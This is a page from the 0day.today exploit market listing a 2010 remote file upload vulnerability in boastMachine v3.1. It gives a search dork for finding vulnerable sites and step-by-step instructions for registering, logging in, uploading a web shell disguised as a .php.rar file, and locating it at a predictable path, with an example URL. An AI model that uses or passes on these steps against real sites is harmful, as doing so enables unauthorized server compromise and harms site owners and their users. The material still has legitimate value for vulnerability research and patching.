[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

boastMachine v3.1 Remote File Upload Vulnerability

Author
alnjm33
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10718
Category
web applications
Date add
24-01-2010
Platform
unsorted
==================================================
boastMachine v3.1 Remote File Upload Vulnerability
==================================================

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Exploit Title : boastMachine v3.1 Remote File Upload Vulnerability
Author: alnjm33
Software Link: http://boastology.com/pages/dload.php?id=bmachine-3.1.zip
Software Link2:http://boastology.com/pages/dload.php?id=bmachine-3.1.rar
Version: 3.1
Tested on: Version 3.1
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
==========================================Dork==========================================
( Powered by boastMachine v3.1 )
================================Exploit=============================================
First join in the Site
/Server/path/register.php
After that
login in the Site
/Server/path/login.php
After Login
go to this link
/Server/path/bmc/files.php?form_id=new
Now upload your shell like ( Shell.php.rar )
Now you can find your shell here
/Server/path/files/username_Shell.php.rar
e.g
http://server/hp_boastMachine/files/alnjm33_aasaa.php.rar
=======================================================================================



#  0day.today [2024-12-24]  #